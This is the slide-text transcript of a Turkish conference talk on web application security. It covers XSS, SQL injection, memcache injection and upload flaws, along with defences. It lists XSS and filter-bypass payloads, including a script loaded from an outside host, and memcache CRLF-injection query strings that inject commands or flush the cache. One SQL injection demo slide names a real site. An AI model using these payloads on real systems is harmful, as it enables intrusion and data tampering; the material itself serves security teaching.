web uygulama güvenliği (akademik bilişim 2016)
TRANSCRIPT
Web Uygulama GüvenliğiAkademik Bilişim 2016
Ömer Çıtak
#! whoami
Full-Stack Developer @ Cydets Inc.
development && security
www.omercitak.com
Social : @Om3rCitak
#! cat index• Cross-site Scripting (XSS)
• SQL Injection
• Memcache Injection
• Upload Authentication
#! ping-pong.jpg
#! dont-trust-anyone.jpg
#! cross-site-scripting• Reflected XSS• DOM Based XSS• Stored XSS
#! reflected-xss.jpg
#! reflected-xss-poc.jpg
#! dom-based-xss.jpg
#! stored-xss.jpg
#! stored-xss-poc.jpg
#! stored-xss-poc.jpg
#! cat classic-xss-payloads• <script>alert(1)</script>• <img src="javascript:alert('XSS');">• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>• <SCRIPT a=">"
SRC="http://omercitak.com/xss.js"></SCRIPT>• <video src=1 onerror=alert(1)>• <audio src=1 onerror=alert(1)>• <img src=x onerror=alert(1)">
#! cat xss-bypass-payloads
• <scrscriptipt>alalertert(1)</scrscriptipt>• alert(String.fromCharCode(88,83,83))• <IMG
SRC=ja…………….')>• <IMG SRC='vbscript:msgbox("XSS")'>
#! xss-protection-1.jpg• Strip Tags
– http://php.net/manual/tr/function.strip-tags.php
#! xss-protection-2.jpg• HTML Special Chars
– http://php.net/manual/tr/function.htmlspecialchars.php
#! xss-protection-3.jpg• HttpOnly Cookies (session_set_cookie_params)
#! xss-protection-4.jpg
#! xss-protection-4.jpg
#! xss-demo.jpg
#! sql-injection• Union Based SQL Injection• Blind SQL Injection• Time Based SQL Injection
#! union-based-sql-injection.jpg
#! sql-injection-login-bypass.jpg
#! cat blind-sql-injection
• Ya hatalar gizlenmiş ise? (error_reporting(0))
• Ya mysql_* fonksiyonlarının başına «@» konulmuş ise?
#! blind-sql-injection.jpg
Reis Yaradanöbür tarafta
sormayacak mı reisneden Blind Injection
denemedin diye?
#! blind-sql-injection.jpg
#! blind-sql-injection-poc.jpg
#! blind-sql-injection-poc.jpg
#! cat time-based-sql-injection• Ya arka planda çıktı vermeyen bir query çalışıyor
ise?– Count Query– Update Query– Insert Query– Delete Query– Relationship Query
#! time-based-sql-injection.jpg
#! time-based-sql-injection.jpgMySQL Server
Microsoft SQL Server
Oracle Server
#! sql-injection-poc.jpgUluslararası Af Örgütü (amnesty.org.tr)
#! sql-injection-poc.jpg
#! sql-injection-demo.jpg
#! memcache-injection
#! using-memcache.jpg
#! phpstorm memcached.php
#! telnet 127.0.0.1 11211> set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END
#! phpstorm memcached.php
#! phpstorm memcached.php
#! phpstorm memcached.php
#! phpstorm memcached.php
#! phpstorm memcached.php?key=omer 0 10 6 \r\n hacked \r\n
• urlencode(‘\r’) = %0d • urlencode(‘\n’) = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a
#! phpstorm memcached.php
> set omer 0 3600 6 > hacked < STORED > 123456 < ERROR
#! phpstorm memcached.php?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251) flush_all %0d%0a
#! cat vulnerable-libraries
Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached
#! cat safe_libraries
Python : python-memcache Php : memcache Java : java.net.spy.memcached
#! cat using-memcached-library
Wordpress Joomla 3.2.2 Piwik 2.1.0 MODX Revolution 2.3
#! ascii-table.jpg
#! phpstorm memcached.php
#! upload-authentication
#! upload-authentication-poc
#! wget questions
#! exit
Thanks <3
www.omercitak.com
Social : @Om3rCitak